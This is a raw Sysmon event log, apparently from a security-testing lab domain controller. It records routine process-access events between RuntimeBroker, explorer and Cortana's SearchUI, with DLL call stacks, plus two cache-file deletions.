22:52:56.410{05ADC7E1-29F2-6039-CB05-00000000AD01}42803880C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694452Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.410{05ADC7E1-29F2-6039-CB05-00000000AD01}42808196C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694451Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.410{05ADC7E1-29F2-6039-CB05-00000000AD01}42809192C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694450Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.410{05ADC7E1-29F2-6039-CB05-00000000AD01}42809192C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694449Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.410{05ADC7E1-29F2-6039-CB05-00000000AD01}42808196C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694448Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.410{05ADC7E1-29F2-6039-CB05-00000000AD01}4280748C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694447Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.410{05ADC7E1-29F2-6039-CB05-00000000AD01}4280748C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x80000000000000001694446Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.352{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\SWZP0EDD\microsoft.windows[1].xmlMD5=85142F70B356DF812313DA984ADD8291,SHA256=8D355EBAE67DA28E1F01E13A3A640109833D784A21B81BA94684B84FEC4D9809,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001694445Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.352{05ADC7E1-1E7A-603D-D07D-00000000AD01}57961296C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+27e9|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001694444Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.352{05ADC7E1-1E7A-603D-D07D-00000000AD01}57961296C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+27e9|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001694443Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.349{05ADC7E1-29F2-6039-CB05-00000000AD01}4280748C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694442Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.349{05ADC7E1-29F2-6039-CB05-00000000AD01}42808196C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694441Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.348{05ADC7E1-29F2-6039-CB05-00000000AD01}4280748C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694440Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.348{05ADC7E1-29F2-6039-CB05-00000000AD01}42808196C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694439Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.348{05ADC7E1-29F2-6039-CB05-00000000AD01}42809192C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694438Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.348{05ADC7E1-29F2-6039-CB05-00000000AD01}42809192C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694437Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.348{05ADC7E1-29F2-6039-CB05-00000000AD01}42808196C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694436Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.332{05ADC7E1-29F2-6039-CB05-00000000AD01}42808196C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694435Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.332{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968500C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694434Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.332{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968500C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001694433Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.332{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\SWZP0EDD\microsoft.windows[1].xmlMD5=74EEFBEF5052441007A9B3EE92013D48,SHA256=88AAFE601CFE35EF879170FF47AB0AFD775E38847B114C3DD008C8F0C695F2FE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001694432Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 